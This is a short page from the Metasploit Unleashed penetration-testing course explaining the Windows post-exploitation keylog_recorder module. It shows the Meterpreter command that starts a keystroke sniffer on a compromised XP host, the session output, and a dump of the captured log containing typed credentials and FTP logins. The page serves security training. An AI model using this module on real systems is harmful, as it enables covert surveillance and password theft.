Windows Post Capture Modules

From Metasploit Unleashed
Jump to: navigation, search


keylog_recorder

The "keylog_recorder" post module captures keystrokes on the compromised system. Note that you will want to ensure that you have migrated to an interactive process prior to capturing keystrokes.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter >

After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.

root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root  s3cr3t
ftp ftp.micro
soft.com  anonymous  anon@ano
n.com  e  quit  
root@kali:~#




Module Reference > Post Modules > Windows Post Modules > Windows Post Capture Modules